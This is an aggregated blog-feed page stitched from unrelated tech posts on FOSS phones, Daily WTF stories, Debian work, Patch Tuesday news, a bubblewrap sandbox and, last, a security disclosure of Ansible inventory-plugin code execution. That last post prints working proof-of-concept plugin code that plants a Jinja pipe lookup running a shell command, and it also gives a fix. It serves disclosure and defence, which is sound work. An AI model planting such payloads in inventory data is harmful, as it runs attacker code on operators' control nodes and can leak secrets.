Folding phones also provide new possibilities for the OS. The Oppo OnePlus Open and the Google Pixel Fold both have a UI based around using the two halves of the folding screen for separate data at some times. I think that the current user interfaces for desktop PCs don’t properly take advantage of multiple monitors and the possibilities raised by folding phones only adds to the lack. My pet peeve with multiple monitor setups is when they don’t make it obvious which monitor has keyboard focus so you send a CTRL-W or ALT-F4 to the wrong screen by mistake, it’s a problem that also happens on a single screen but is worse with multiple screens. There are rumours of phones described as “three fold” (where three means the number of segments – with two folds between them), it will be interesting to see how that goes.

Will phones go the same way as PCs in terms of having a separation between the compute bit and the input device? It’s quite possible to have a compute device in the phone form factor inside a secure pocket which talks via Bluetooth to another device with a display and speakers. Then you could change your phone between a phone-size display and a tablet sized display easily and when using your phone a thief would not be able to easily steal the compute bit (which has passwords etc). Could the “watch” part of the phone (strapped to your wrist and difficult to steal) be the active part and have a tablet size device as an external display? There are already announcements of smart watches with up to 1GB of RAM (same as the Samsung Galaxy S3), that’s enough for a lot of phone functionality.

The Rabbit R1 [8] and the Humane AI Pin [9] have some interesting possibilities for AI speech interfaces. Could that take over some of the current phone use? It seems that visually impaired people have been doing badly in the trend towards touch screen phones so an option of a voice interface phone would be a good option for them. As an aside I hope some people are working on AI stuff for FOSS devices.

Laptop Like

One interesting PC variant I just discovered is the Higole 2 Pro portable battery operated Windows PC with 5.5″ touch screen [10]. It looks too thick to fit in the same pockets as current phones but is still very portable. The version with built in battery is $AU423 which is in the usual price range for low end laptops and tablets. I don’t think this is the future of computing, but it is something that is usable today while we wait for foldable devices to take over.

The recent release of the Apple Vision Pro [11] has driven interest in 3D and head mounted computers. I think this could be a useful peripheral for a laptop or phone but it won’t be part of a primary computing environment. In 2011 I wrote about the possibility of using augmented reality technology for providing a desktop computing environment [12]. I wonder how a Vision Pro would work for that on a train or passenger jet.

Another interesting thing that’s on offer is a laptop with 7″ touch screen beside the keyboard [13]. It seems that someone just looked at what parts are available cheaply in China (due to being parts of more popular devices) and what could fit together. I think a keyboard should be central to the monitor for serious typing, but there may be useful corner cases where typing isn’t that common and a touch-screen display is of use. Developing a range of strange hardware and then seeing which ones get adopted is a good thing and an advantage of Ali Express and Temu.

Useful Hardware for Developing These Things

I recently bought a second hand Thinkpad X1 Yoga Gen3 for $359 which has stylus support [14], and it’s generally a great little laptop in every other way. There’s a common failure case of that model where touch support for fingers breaks but the stylus still works which allows it to be used for testing touch screen functionality while making it cheap.

The PineTime is a nice smart watch from Pine64 which is designed to be open [15]. I am quite happy with it but haven’t done much with it yet (apart from wearing it every day and getting alerts etc from Android). At $50 when delivered to Australia it’s significantly more expensive than most smart watches with similar features but still a lot cheaper than the high end ones. Also the Raspberry Pi Watch [16] is interesting too.

The PinePhonePro is an OK phone made to open standards but it’s hardware isn’t as good as Android phones released in the same year [17]. I’ve got some useful stuff done on mine, but the battery life is a major issue and the screen resolution is low. The Librem 5 phone from Purism has a better hardware design for security with switches to disable functionality [18], but it’s even slower than the PinePhonePro. These are good devices for test and development but not ones that many people would be excited to use every day.

Wwan hardware (for accessing the phone network) in M.2 form factor can be obtained for free if you have access to old/broken laptops. Such devices start at about $35 if you want to buy one. USB GPS devices also start at about $35 so probably not worth getting if you can get a wwan device that does GPS as well.

What We Must Do

Debian appears to have some voice input software in the pocketsphinx package but no documentation on how it’s to be used. This would be a good thing to document, I spent 15 mins looking at it and couldn’t get it going.

To take advantage of the hardware features in phones we need software support and we ideally don’t want free software to lag too far behind proprietary software – which IMHO means the typical Android setup for phones/tablets.

Support for changing screen resolution is already there as is support for touch screens. Support for adapting the GUI to changed screen size is something that needs to be done – even today’s hardware of connecting a small laptop to an external monitor doesn’t have the ideal functionality for changing the UI. There also seem to be some limitations in touch screen support with multiple screens, I haven’t investigated this properly yet, it definitely doesn’t work in an expected manner in Ubuntu 22.04 and I haven’t yet tested the combinations on Debian/Unstable.

ML is becoming a big thing and it has some interesting use cases for small devices where a smart device can compensate for limited input options. There’s a lot of work that needs to be done in this area and we are limited by the fact that we can’t just rip off the work of other people for use as training data in the way that corporations do.

Security is more important for devices that are at high risk of theft. The vast majority of free software installations are way behind Android in terms of security and we need to address that. I have some ideas for improvement but there is always a conflict between security and usability and while Android is usable for it’s own special apps it’s not usable in a “I want to run applications that use any files from any other applicationsin any way I want” sense. My post about Sandboxing Phone apps is relevant for people who are interested in this [19]. We also need to extend security models to cope with things like “ok google” type functionality which has the potential to be a bug and the emerging class of LLM based attacks.

I will write more posts about these thing.

Please write comments mentioning FOSS hardware and software projects that address these issues and also documentation for such things.

Worse Than FailureCheck Your Email

Branon's boss, Steve, came storming into his cube. From the look of panic on his face, it was clear that this was a full hair-on-fire emergency.

"Did we change anything this weekend?"

"No," Branon said. "We never deploy on a weekend."

"Well, something must have changed?!"

After a few rounds of this, Steve's panic wore off and he explained a bit more clearly. Every night, their application was supposed to generate a set of nightly reports and emailed them out. These reports went to a number of people in the company, up to and including the CEO. Come Monday morning, the CEO checked his inbox and horror of horror- there was no report!

"And going back through people's inboxes, this seems like it's been a problem for months- nobody seems to have received one for months."

"Why are they just noticing now?" Branon asked.

"That's really not the problem here. Can you investigate why the emails aren't going out?"

Branon put aside his concerns, and agreed to dig through and debug the problem. Given that it involved sending emails, Branon was ready to spend a long time trying to debug whatever was going wrong in the chain. Instead, finding the problem only took about two minutes, and most of that was spent getting coffee.

public void Send()
{
    //TODO: send email here
}

This application had been in production over a year. This function had not been modified in that time. So while it's technically true that no one had received a report "for months" (16 months is a number of months), it would probably have been more accurate to say that they had never received a report. Now, given that it had been over a year, you'd think that maybe this report wasn't that important, but now that the CEO had noticed, it was the most important thing at the company. Work on everything else stopped until this was done- mind you, it only took one person a few hours to implement and test the feature, but still- work on everything else stopped.

A few weeks later a new ticket was opened: people felt that the nightly reports were too frequent, and wanted to instead just go to the site to pull the report, which is what they had been doing for the past 16 months.

[Advertisement] Keep the plebs out of prod. Restrict NuGet feed privileges with ProGet. Learn more.

365 TomorrowsAlways in Line

Author: Frederick Charles Melancon The scars don’t glow like they once did, yet around my pants’ cuffs, neon-green halos still light my ankles. Mom used to love halos—hanging glass circles around the house to create them. But these marks from the bombing blasts on Mars shine so bright that they still keep me up at […]

The post Always in Line appeared first on 365tomorrows.

Planet DebianFreexian Collaborators: Debian Contributions: Upcoming Improvements to Salsa CI, /usr-move, packaging simplemonitor, and more! (by Utkarsh Gupta)

Contributing to Debian is part of Freexian’s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

/usr-move, by Helmut Grohne

Much of the work was spent on handling interaction with time time64 transition and sending patches for mitigating fallout. The set of packages relevant to debootstrap is mostly converted and the patches for glibc and base-files have been refined due to feedback from the upload to Ubuntu noble. Beyond this, he sent patches for all remaining packages that cannot move their files with dh-sequence-movetousr and packages using dpkg-divert in ways that dumat would not recognize.

Upcoming improvements to Salsa CI, by Santiago Ruano Rincón

Last month, Santiago Ruano Rincón started the work on integrating sbuild into the Salsa CI pipeline. Initially, Santiago used sbuild with the unshare chroot mode. However, after discussion with josch, jochensp and helmut (thanks to them!), it turns out that the unshare mode is not the most suitable for the pipeline, since the level of isolation it provides is not needed, and some test suites would fail (eg: krb5). Additionally, one of the requirements of the build job is the use of ccache, since it is needed by some C/C++ large projects to reduce the compilation time. In the preliminary work with unshare last month, it was not possible to make ccache to work.

Finally, Santiago changed the chroot mode, and now has a couple of POC (cf: 1 and 2) that rely on the schroot and sudo, respectively. And the good news is that ccache is successfully used by sbuild with schroot!

The image here comes from an example of building grep. At the end of the build, ccache -s shows the statistics of the cache that it used, and so a little more than half of the calls of that job were cacheable. The most important pieces are in place to finish the integration of sbuild into the pipeline.

Other than that, Santiago also reviewed the very useful merge request !346, made by IOhannes zmölnig to autodetect the release from debian/changelog. As agreed with IOhannes, Santiago is preparing a merge request to include the release autodetection use case in the very own Salsa CI’s CI.

Packaging simplemonitor, by Carles Pina i Estany

Carles started using simplemonitor in 2017, opened a WNPP bug in 2022 and started packaging simplemonitor dependencies in October 2023. After packaging five direct and indirect dependencies, Carles finally uploaded simplemonitor to unstable in February.

During the packaging of simplemonitor, Carles reported a few issues to upstream. Some of these were to make the simplemonitor package build and run tests reproducibly. A reproducibility issue was reprotest overriding the timezone, which broke simplemonitor’s tests. There have been discussions on resolving this upstream in simplemonitor and in reprotest, too.

Carles also started upgrading or improving some of simplemonitor’s dependencies.

Miscellaneous contributions

  • Stefano Rivera spent some time doing admin on debian.social infrastructure. Including dealing with a spike of abuse on the Jitsi server.
  • Stefano started to prepare a new release of dh-python, including cleaning out a lot of old Python 2.x related code. Thanks to Niels Thykier (outside Freexian) for spear-heading this work.
  • DebConf 24 planning is beginning. Stefano discussed venues and finances with the local team and remotely supported a site-visit by Nattie (outside Freexian).
  • Also in the DebConf 24 context, Santiago took part in discussions and preparations related to the Content Team.
  • A JIT bug was reported against pypy3 in Debian Bookworm. Stefano bisected the upstream history to find the patch (it was already resolved upstream) and released an update to pypy3 in bookworm.
  • Enrico participated in /usr-merge discussions with Helmut.
  • Colin Watson backported a python-channels-redis fix to bookworm, rediscovered while working on debusine.
  • Colin dug into a cluster of celery build failures and tracked the hardest bit down to a Python 3.12 regression, now fixed in unstable. celery should be back in testing once the 64-bit time_t migration is out of the way.
  • Thorsten Alteholz uploaded a new upstream version of cpdb-libs. Unfortunately upstream changed the naming of their release tags, so updating the watch file was a bit demanding. Anyway this version 2.0 is a huge step towards introduction of the new Common Print Dialog Backends.
  • Helmut send patches for 48 cross build failures.
  • Helmut changed debvm to use mkfs.ext4 instead of genext2fs.
  • Helmut sent a debci MR for improving collector robustness.
  • In preparation for DebConf 25, Santiago worked on the Brest Bid.

,

Krebs on SecurityPatch Tuesday, March 2024 Edition

Apple and Microsoft recently released software updates to fix dozens of security holes in their operating systems. Microsoft today patched at least 60 vulnerabilities in its Windows OS. Meanwhile, Apple’s new macOS Sonoma addresses at least 68 security weaknesses, and its latest update for iOS fixes two zero-day flaws.

Last week, Apple pushed out an urgent software update to its flagship iOS platform, warning that there were at least two zero-day exploits for vulnerabilities being used in the wild (CVE-2024-23225 and CVE-2024-23296). The security updates are available in iOS 17.4, iPadOS 17.4, and iOS 16.7.6.

Apple’s macOS Sonoma 14.4 Security Update addresses dozens of security issues. Jason Kitka, chief information security officer at Automox, said the vulnerabilities patched in this update often stem from memory safety issues, a concern that has led to a broader industry conversation about the adoption of memory-safe programming languages [full disclosure: Automox is an advertiser on this site].

On Feb. 26, 2024, the Biden administration issued a report that calls for greater adoption of memory-safe programming languages. On Mar. 4, 2024, Google published Secure by Design, which lays out the company’s perspective on memory safety risks.

Mercifully, there do not appear to be any zero-day threats hounding Windows users this month (at least not yet). Satnam Narang, senior staff research engineer at Tenable, notes that of the 60 CVEs in this month’s Patch Tuesday release, only six are considered “more likely to be exploited” according to Microsoft.

Those more likely to be exploited bugs are mostly “elevation of privilege vulnerabilities” including CVE-2024-26182 (Windows Kernel), CVE-2024-26170 (Windows Composite Image File System (CimFS), CVE-2024-21437 (Windows Graphics Component), and CVE-2024-21433 (Windows Print Spooler).

Narang highlighted CVE-2024-21390 as a particularly interesting vulnerability in this month’s Patch Tuesday release, which is an elevation of privilege flaw in Microsoft Authenticator, the software giant’s app for multi-factor authentication. Narang said a prerequisite for an attacker to exploit this flaw is to already have a presence on the device either through malware or a malicious application.

“If a victim has closed and re-opened the Microsoft Authenticator app, an attacker could obtain multi-factor authentication codes and modify or delete accounts from the app,” Narang said. “Having access to a target device is bad enough as they can monitor keystrokes, steal data and redirect users to phishing websites, but if the goal is to remain stealth, they could maintain this access and steal multi-factor authentication codes in order to login to sensitive accounts, steal data or hijack the accounts altogether by changing passwords and replacing the multi-factor authentication device, effectively locking the user out of their accounts.”

CVE-2024-21334 earned a CVSS (danger) score of 9.8 (10 is the worst), and it concerns a weakness in Open Management Infrastructure (OMI), a Linux-based cloud infrastructure in Microsoft Azure. Microsoft says attackers could connect to OMI instances over the Internet without authentication, and then send specially crafted data packets to gain remote code execution on the host device.

CVE-2024-21435 is a CVSS 8.8 vulnerability in Windows OLE, which acts as a kind of backbone for a great deal of communication between applications that people use every day on Windows, said Ben McCarthy, lead cybersecurity engineer at Immersive Labs.

“With this vulnerability, there is an exploit that allows remote code execution, the attacker needs to trick a user into opening a document, this document will exploit the OLE engine to download a malicious DLL to gain code execution on the system,” Breen explained. “The attack complexity has been described as low meaning there is less of a barrier to entry for attackers.”

A full list of the vulnerabilities addressed by Microsoft this month is available at the SANS Internet Storm Center, which breaks down the updates by severity and urgency.

Finally, Adobe today issued security updates that fix dozens of security holes in a wide range of products, including Adobe Experience Manager, Adobe Premiere Pro, ColdFusion 2023 and 2021, Adobe Bridge, Lightroom, and Adobe Animate. Adobe said it is not aware of active exploitation against any of the flaws.

By the way, Adobe recently enrolled all of its Acrobat users into a “new generative AI feature” that scans the contents of your PDFs so that its new “AI Assistant” can  “understand your questions and provide responses based on the content of your PDF file.” Adobe provides instructions on how to disable the AI features and opt out here.

Cryptogram Automakers Are Sharing Driver Data with Insurers without Consent

Kasmir Hill has the story:

Modern cars are internet-enabled, allowing access to services like navigation, roadside assistance and car apps that drivers can connect to their vehicles to locate them or unlock them remotely. In recent years, automakers, including G.M., Honda, Kia and Hyundai, have started offering optional features in their connected-car apps that rate people’s driving. Some drivers may not realize that, if they turn on these features, the car companies then give information about how they drive to data brokers like LexisNexis [who then sell it to insurance companies].

Automakers and data brokers that have partnered to collect detailed driving data from millions of Americans say they have drivers’ permission to do so. But the existence of these partnerships is nearly invisible to drivers, whose consent is obtained in fine print and murky privacy policies that few read.

Cryptogram Burglars Using Wi-Fi Jammers to Disable Security Cameras

The arms race continues, as burglars are learning how to use jammers to disable Wi-Fi security cameras.

Planet DebianRussell Coker: Android vs FOSS Phones

To achieve my aims regarding Convergence of mobile phone and PC [1] I need something a big bigger than the 4G of RAM that’s in the PinePhone Pro [2]. The PinePhonePro was released at the end of 2021 but has a SoC that was first released in 2016. That SoC seems to compare well to the ones used in the Pixel and Pixel 2 phones that were released in the same time period so it’s not a bad SoC, but it doesn’t compare well to more recent Android devices and it also isn’t a great fit for the non-Android things I want to do. Also the PinePhonePro and Librem5 have relatively short battery life so reusing Android functionality for power saving could provide a real benefit. So I want a phone designed for the mass market that I can use for running Debian.

PostmarketOS

One thing I’m definitely not going to do is attempt a full port of Linux to a different platform or support of kernel etc. So I need to choose a device that already has support from a somewhat free Linux system. The PostmarketOS system is the first I considered, the PostmarketOS Wiki page of supported devices [3] was the first place I looked. The “main” supported devices are the PinePhone (not Pro) and the Librem5, both of which are under-powered. For the “community” devices there seems to be nothing that supports calls, SMS, mobile data, and USB-OTG and which also has 4G of RAM or more. If I skip USB-OTG (which presumably means I’d have to get dock functionality via wifi – not impossible but not great) then I’m left with the SHIFT6mq which was never sold in Australia and the Xiomi POCO F1 which doesn’t appear to be available on ebay.

LineageOS

The libhybris libraries are a compatibility layer between Android and glibc programs [4]. Which includes running Wayland with Android display drivers. So running a somewhat standard Linux desktop on top of an Android kernel should be possible. Here is a table of the LineageOS supported devices that seem to have a useful feature set and are available in Australia and which could be used for running Debian with firmware and drivers copied from Android. I only checked LineageOS as it seems to be the main free Android build.

Phone RAM External Display Price
Edge 20 Pro [5] 6-12G HDMI $500 not many on sale
Edge S aka moto G100 [6] 6-8G HDMI $500 to $600+
Fairphone 4 6-8G USBC-DP $1000+
Nubia Red Magic 5G 8-16G USBC-DP $600+

The LineageOS device search page [9] allows searching by kernel version. There are no phones with a 6.6 (2023) or 6.1 (2022) Linux kernel and only the Pixel 8/8Pro and the OnePlus 11 5G run 5.15 (2021). There are 8 Google devices (Pixel 6/7 and a tablet) running 5.10 (2020), 18 devices running 5.4 (2019), and 32 devices running 4.19 (2018). There are 186 devices running kernels older than 4.19 – which aren’t in the kernel.org supported release list [10]. The Pixel 8 Pro with 12G of RAM and the OnePlus 11 5G with 16G of RAM are appealing as portable desktop computers, until recently my main laptop had 8G of RAM. But they cost over $1000 second hand compared to $359 for my latest laptop.

Fosdem had an interesting lecture from two Fairphone employees about what they are doing to make phone production fairer for workers and less harmful for the environment [11]. But they don’t have the market power that companies like Google have to tell SoC vendors what they want.

IP Laws and Practices

Bunnie wrote an insightful and informative blog post about the difference between intellectual property practices in China and US influenced countries and his efforts to reverse engineer a commonly used Chinese SoC [12]. This is a major factor in the lack of support for FOSS on phones and other devices.

Droidian and Buying a Note 9

The FOSDEM 2023 has a lecture about the Droidian project which runs Debian with firmware and drivers from Android to make a usable mostly-FOSS system [13]. It’s interesting how they use containers for the necessary Android apps. Here is the list of devices supported by Droidian [14].

Two notable entries in the list of supported devices are the Volla Phone and Volla Phone 22 from Volla – a company dedicated to making open Android based devices [15]. But they don’t seem to be available on ebay and the new price of the Volla Phone 22 is E452 ($AU750) which is more than I want to pay for a device that isn’t as open as the Pine64 and Purism products. The Volla Phone 22 only has 4G of RAM.

Phone RAM Price Issues
Note 9 128G/512G 6G/8G <$300 Not supporting external display
Galaxy S9+ 6G <$300 Not supporting external display
Xperia 5 6G >$300 Hotspot partly working
OnePlus 3T 6G $200 – $400+ photos not working

I just bought a Note 9 with 128G of storage and 6G of RAM for $109 to try out Droidian, it has some screen burn but that’s OK for a test system and if I end up using it seriously I’ll just buy another that’s in as-new condition. With no support for an external display I’ll need to setup a software dock to do Convergence, but that’s not a serious problem. If I end up making a Note 9 with Droidian my daily driver then I’ll use the 512G/8G model for that and use the cheap one for testing.

Mobian

I should have checked the Mobian list first as it’s the main Debian variant for phones.

From the Mobian Devices list [16] the OnePlus 6T has 8G of RAM or more but isn’t available in Australia and costs more than $400 when imported. The PocoPhone F1 doesn’t seem to be available on ebay. The Shift6mq is made by a German company with similar aims to the Fairphone [17], it looks nice but costs E577 which is more than I want to spend and isn’t on the officially supported list.

Smart Watches

The same issues apply to smart watches. AstereoidOS is a free smart phone OS designed for closed hardware [18]. I don’t have time to get involved in this sort of thing though, I can’t hack on every device I use.

Worse Than FailureCodeSOD: Wait for the End

Donald was cutting a swathe through a jungle of old Java code, when he found this:

protected void waitForEnd(float time) {
	// do nothing
}

Well, this function sure sounds like it's waiting around to die. This protected method is called from a private method, and you might expect that child classes actually implement real functionality in there, but there were no child classes. This was called in several places, and each time it was passed Float.MAX_VALUE as its input.

Poking at that odd function also lead to this more final method:

public void waitAtEnd() {
	System.exit(0);
}

This function doesn't wait for anything- it just ends the program. Finally and decisively. It is the end.

I know the end of this story: many, many developers have worked on this code base, and many of them hoped to clean up the codebase and make it better. Many of them got lost, never to return. Many ran away screaming.

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

365 TomorrowsBait

Author: Majoki The float bobs and I feel a slight tug on the line, a nip at the hook. A shiver of guilt, a nanosecond’s exhilaration. I finesse the reel, patient. What will rise? There’s nothing like fishing in a black hole, quantum casting for bits and pieces of worlds beneath, within, among. You just […]

The post Bait appeared first on 365tomorrows.

,

Planet DebianDirk Eddelbuettel: digest 0.6.35 on CRAN: New xxhash code

Release 0.6.35 of the digest package arrived at CRAN today and has also been uploaded to Debian already.

digest creates hash digests of arbitrary R objects. It can use a number different hashing algorithms (md5, sha-1, sha-256, sha-512, crc32, xxhash32, xxhash64, murmur32, spookyhash, blake3,crc32c – and now also xxh3_64 and xxh3_128), and enables easy comparison of (potentially large and nested) R language objects as it relies on the native serialization in R. It is a mature and widely-used package (with 65.8 million downloads just on the partial cloud mirrors of CRAN which keep logs) as many tasks may involve caching of objects for which it provides convenient general-purpose hash key generation to quickly identify the various objects.

This release updates the included xxHash version to the current verion 0.8.2 updating the existing xxhash32 and xxhash64 hash functions — and also adding the newer xxh3_64 and xxh3_128 ones. We have a project at work using xxh3_128 from Python which made me realize having it from R would be nice too, and given the existing infrastructure in the package actually doing so was fairly quick and straightforward.

My CRANberries provides a summary of changes to the previous version. For questions or comments use the issue tracker off the GitHub repo. For documentation (including the changelog) see the documentation site.

If you like this or other open-source work I do, you can now sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Planet DebianJoachim Breitner: Convenient sandboxed development environment

I like using one machine and setup for everything, from serious development work to hobby projects to managing my finances. This is very convenient, as often the lines between these are blurred. But it is also scary if I think of the large number of people who I have to trust to not want to extract all my personal data. Whenever I run a cabal install, or a fun VSCode extension gets updated, or anything like that, I am running code that could be malicious or buggy.

In a way it is surprising and reassuring that, as far as I can tell, this commonly does not happen. Most open source developers out there seem to be nice and well-meaning, after all.

Convenient or it won’t happen

Nevertheless I thought I should do something about this. The safest option would probably to use dedicated virtual machines for the development work, with very little interaction with my main system. But knowing me, that did not seem likely to happen, as it sounded like a fair amount of hassle. So I aimed for a viable compromise between security and convenient, and one that does not get too much in the way of my current habits.

For instance, it seems desirable to have the project files accessible from my unconstrained environment. This way, I could perform certain actions that need access to secret keys or tokens, but are (unlikely) to run code (e.g. git push, git pull from private repositories, gh pr create) from “the outside”, and the actual build environment can do without access to these secrets.

The user experience I thus want is a quick way to enter a “development environment” where I can do most of the things I need to do while programming (network access, running command line and GUI programs), with access to the current project, but without access to my actual /home directory.

I initially followed the blog post “Application Isolation using NixOS Containers” by Marcin Sucharski and got something working that mostly did what I wanted, but then a colleague pointed out that tools like firejail can achieve roughly the same with a less “global” setup. I tried to use firejail, but found it to be a bit too inflexible for my particular whims, so I ended up writing a small wrapper around the lower level sandboxing tool https://github.com/containers/bubblewrap.

Selective bubblewrapping

This script, called dev and included below, builds a new filesystem namespace with minimal /proc and /dev directories, it’s own /tmp directories. It then binds-mound some directories to make the host’s NixOS system available inside the container (/bin, /usr, the nix store including domain socket, stuff for OpenGL applications). My user’s home directory is taken from ~/.dev-home and some configuration files are bind-mounted for convenient sharing. I intentionally don’t share most of the configuration – for example, a direnv enable in the dev environment should not affect the main environment. The X11 socket for graphical applications and the corresponding .Xauthority file is made available. And finally, if I run dev in a project directory, this project directory is bind mounted writable, and the current working directory is preserved.

The effect is that I can type dev on the command line to enter “dev mode” rather conveniently. I can run development tools, including graphical ones like VSCode, and especially the latter with its extensions is part of the sandbox. To do a git push I either exit the development environment (Ctrl-D) or open a separate terminal. Overall, the inconvenience of switching back and forth seems worth the extra protection.

Clearly, isn’t going to hold against a determined and maybe targeted attacker (e.g. access to the X11 and the nix daemon socket can probably be used to escape easily). But I hope it will help against a compromised dev dependency that just deletes or exfiltrates data, like keys or passwords, from the usual places in $HOME.

Rough corners

There is more polishing that could be done.

  • In particular, clicking on a link inside VSCode in the container will currently open Firefox inside the container, without access to my settings and cookies etc. Ideally, links would be opened in the Firefox running outside. This is a problem that has a solution in the world of applications that are sandboxed with Flatpak, and involves a bunch of moving parts (a xdg-desktop-portal user service, a filtering dbus proxy, exposing access to that proxy in the container). I experimented with that for a bit longer than I should have, but could not get it to work to satisfaction (even without a container involved, I could not get xdg-desktop-portal to heed my default browser settings…). For now I will live with manually copying and pasting URLs, we’ll see how long this lasts.

  • With this setup (and unlike the NixOS container setup I tried first), the same applications are installed inside and outside. It might be useful to separate the set of installed programs: There is simply no point in running evolution or firefox inside the container, and if I do not even have VSCode or cabal available outside, so that it’s less likely that I forget to enter dev before using these tools.

    It shouldn’t be too hard to cargo-cult some of the NixOS Containers infrastructure to be able to have a separate system configuration that I can manage as part of my normal system configuration and make available to bubblewrap here.

So likely I will refine this some more over time. Or get tired of typing dev and going back to what I did before…

The script

The dev script (at the time of writing)

Planet DebianEvgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now.

TL;DR

Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.

Inventory plugins

Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably the ones fetching instances from clouds like Amazon EC2 and Hetzner Cloud or the ones talking to tools like Foreman.

For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object.

And this is where things are getting interesting. Somebody could add a comment to a host and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell.

Let that sink in for a moment, and then we'll look at an example.

Example inventory plugin

from ansible.plugins.inventory import BaseInventoryPlugin

class InventoryModule(BaseInventoryPlugin):

    NAME = 'evgeni.inventoryrce.inventory'

    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid

    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked" ) }}')

The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:

  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory

In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar.

The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.

Using the example inventory plugin

Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from).

And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need.

If we now call ansible-inventory, we'll see our host and our variable present:

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
{
    "_meta": {
        "hostvars": {
            "exploit.example.com": {
                "ansible_connection": "local",
                "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"
            }
        }
    },
    "all": {
        "children": [
            "ungrouped"
        ]
    },
    "ungrouped": {
        "hosts": [
            "exploit.example.com"
        ]
    }
}

(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.)

So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string.

Executing a playbook, interpreting Jinja

To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.

Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!

- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]

This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:

% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************

TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]

TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] => {
    "hostvars[inventory_hostname]": {
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],

        "something_funny": ""
    }
}

PLAY RECAP *************************************************************************************************
exploit.example.com  : ok=2    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, and the expression was {{ lookup("pipe", "touch /tmp/hacked" ) }} and touch does not return anything. But it did create the file!

% ls -alh /tmp/hacked 
-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked

We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/….

Why is this possible?

This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it.

In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:

from ansible.utils.unsafe_proxy import wrap_var

self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('{{ lookup("pipe", "touch /tmp/hacked" ) }}'))

Which then gets rendered as a string when dumping the variables using debug:

"something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"

But it seems inventories don't do this:

for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)

(aws_ec2.py)

for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)

(hcloud.py)

for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))

(foreman.py)

And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe".

Can something similar happen in other parts of Ansible?

It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481

But even if we only look at inventories, add_host(host) can be abused in a similar way:

from ansible.plugins.inventory import BaseInventoryPlugin

class InventoryModule(BaseInventoryPlugin):

    NAME = 'evgeni.inventoryrce.inventory'

    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid

    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}')
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
